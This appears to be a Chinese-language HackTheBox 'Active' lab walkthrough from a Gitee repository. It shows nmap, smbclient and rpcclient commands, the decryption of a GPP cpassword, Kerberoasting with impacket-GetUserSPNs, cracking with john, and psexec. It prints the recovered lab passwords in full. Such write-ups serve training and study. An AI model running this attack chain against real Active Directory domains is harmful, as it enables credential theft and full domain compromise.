信息收集

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-30 07:58:03Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3889/tcp  filtered dandv-tester
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m46s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-30T07:59:01
|_  start_date: 2021-12-30T07:55:42

检查smb漏洞

nmap -p 139,445 --script=smb-vuln* -Pn 10.10.10.100

没有能打的

查看smb共享

smbclient --no-pass -L //10.10.10.100

active1

继续探测能否登录进共享,发现Replication可登录

smbclient //10.10.10.100/Replication -U ""%""

本想用smbmap -H 10.10.10.100 -R列出所有文件，但可能网太差了，smbmap连不上。

只能手动翻了

active3

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

获得一组账号密码

根据walkthrough：Whenever a new Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft published the key on MSDN!

使用gpp-decrypt解密(pypykatz也可以)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

用这组账号密码尝试登录别的share

#网络太慢的话，smbmap连不上的。但是smbclient可以
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

smbclient //10.10.10.100/Users -U "SVC_TGS"%"GPPstillStandingStrong2k18"

在SVC_TGS的桌面找到user.txt

active4

ps.这里还拿不到shell，因为smb共享该用户都不可写

active8

rpcclient -U "" -N 10.10.10.100
rpcclient $> enumdomusers
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit

ldap:

nmap -n -sV --script "ldap* and not brute" -Pn 10.10.10.100

一长串输出，知道域名是active.htb，配到host里

继续检查域传送漏洞，不存在

dnsrecon -d active.htb -t axfr

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='active.htb'" 10.10.10.100

发现一个Administrator账号

kerberoasting&psexec

查询服务跑在用户账号下的

sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

active5

保存进文件，用john破解

john --wordlist=/usr/share/wordlists/rockyou.txt tgt.out

active6

得到Administrator的密码Ticketmaster1968

有了账号密码可以通过psexec拿shell了

active7

wuerror / hackthebox_oscp

信息收集

kerberoasting&psexec

简介

发行版

贡献者

近期动态

wuerror / hackthebox_oscp .gitee-modal { width: 500px !important; }

信息收集

kerberoasting&psexec

简介

发行版

贡献者

近期动态

搜索帮助

wuerror / hackthebox_oscp